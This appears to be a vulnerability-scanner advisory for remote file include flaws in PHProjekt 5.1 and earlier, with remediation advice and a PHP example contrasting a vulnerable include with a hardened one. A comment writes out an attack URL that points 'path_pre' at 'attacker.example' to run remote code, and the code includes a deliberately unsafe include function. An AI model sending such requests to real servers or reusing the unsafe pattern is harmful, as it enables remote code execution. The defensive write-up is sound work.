VID: 21962
Severity: 40
Port: 80, ...
Protocol: TCP
Class: CGI
Detailed Description:
PHProjekt, an open-source groupware package written in PHP 4, is affected by multiple remote file include (RFI) vulnerabilities in versions 5.1 and earlier. The cause is improper validation of user-supplied input passed to the 'path_pre' parameter of the 'lib/specialdays.php' script and the 'lib_path' parameter of the 'lib/dbman_filter.inc.php' script; each script uses the value as part of the path of a file it includes. If PHP's 'register_globals' setting is enabled, the request parameter is registered as a global variable before the script runs, so a remote attacker can send a specially crafted URL that points the include path at a PHP file on a server they control (remote inclusion additionally requires 'allow_url_fopen', which is on by default in PHP 4 and 5.1) and execute arbitrary PHP code, and through it operating system commands, with the privileges of the web server process on the affected host.
* References:
  http://phprojekt.com/modules.php?op=modload&name=News&file=article&sid=257&mode=thread&order=0
  http://milw0rm.com/exploits/2190
  http://www.frsirt.com/english/advisories/2006/3284
  http://secunia.com/advisories/21526
* Platforms Affected: PHProjekt versions prior to 5.1.1, on any operating system and version.
Recommendation:
Upgrade to PHProjekt 5.1.1 or later, available from the PHProjekt Web site at http://www.phprojekt.com/. Where an immediate upgrade is not possible, disable 'register_globals' in php.ini, since the attack path described above depends on it, and, unless the application needs remote URL includes, disable 'allow_url_fopen' as well. Both settings should be verified after the upgrade too: the fix in 5.1.1 removes the application's dependence on request-controlled globals, but a PHP configuration that registers every request parameter as a global remains a hazard for any other script on the host.
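The include pattern the description refers to, next to a hardened form, as an added example. This is not PHProjekt's source and not the 5.1.1 fix: the included file name ('lib/lib.inc.php'), the host 'attacker.example', and the function names are hypothetical, chosen only to show how a request-controlled include prefix under register_globals becomes code execution and how the recommendation above removes that dependence.

```php
<?php
// Added example: an illustrative reconstruction of the include-prefix pattern
// behind CVE-2006-4204 and a hardened replacement. This is NOT PHProjekt's
// source; the included file name and the host name below are hypothetical.

// ---- Vulnerable pattern (hypothetical, shown but never called here) -------
// With register_globals=On, a request such as
//   GET /lib/specialdays.php?path_pre=http://attacker.example/
// creates the global $path_pre before any line of this script runs. With
// allow_url_fopen=On (the PHP 4 default) include() then fetches and executes
// http://attacker.example/lib/lib.inc.php as the web server user.
function vulnerable_include()
{
    global $path_pre;                          // request-controlled, never initialised here
    include($path_pre . 'lib/lib.inc.php');    // attacker chooses the prefix
}

// ---- Hardened pattern -----------------------------------------------------
// Never take a filesystem prefix from the request: fix it from the script's
// own location, and verify every computed include path before using it.
define('APP_ROOT', realpath(dirname(__FILE__)));

// Returns the canonical path of an existing regular file under APP_ROOT,
// or false for anything else (URL wrapper, traversal, directory, missing file).
function resolve_local_app_file($relative)
{
    // Refuse stream wrappers (http://, ftp://, php://, data:) before touching
    // the filesystem, so they are rejected explicitly rather than by accident.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative)) {
        return false;
    }
    $resolved = realpath(APP_ROOT . '/' . $relative);
    if ($resolved === false || !is_file($resolved)) {
        return false;                          // missing file or a directory
    }
    // realpath() has collapsed any ../ segments, so a prefix check on the
    // canonical path is enough to keep the include inside APP_ROOT.
    if (strpos($resolved, APP_ROOT . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $resolved;
}

// Includes a file chosen by the application; returns false instead of
// including when the path does not resolve to a local file under APP_ROOT.
function hardened_include($relative)
{
    $path = resolve_local_app_file($relative);
    if ($path === false) {
        trigger_error('refused include of ' . $relative, E_USER_WARNING);
        return false;
    }
    include($path);
    return true;
}

// Deployment check: the attack path above depends on register_globals, so
// warn loudly when it is on instead of trusting every global variable.
if (ini_get('register_globals')) {
    trigger_error('register_globals is enabled; disable it in php.ini', E_USER_WARNING);
}

// Usage: the include target is a literal chosen by the application, not by
// the client. Values such as '../../../etc/passwd' or 'http://attacker.example/'
// are rejected by resolve_local_app_file() before include() is reached.
hardened_include('lib/lib.inc.php');
```

The essential change is that the hardened code takes no prefix from the request at all; resolve_local_app_file() is defence in depth for the case where a relative file name is still computed from something variable, and the register_globals check turns a silent misconfiguration into a logged warning.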
Related URL:
CVE-2006-4204 (CVE)
19541 (SecurityFocus)
28560 (ISS)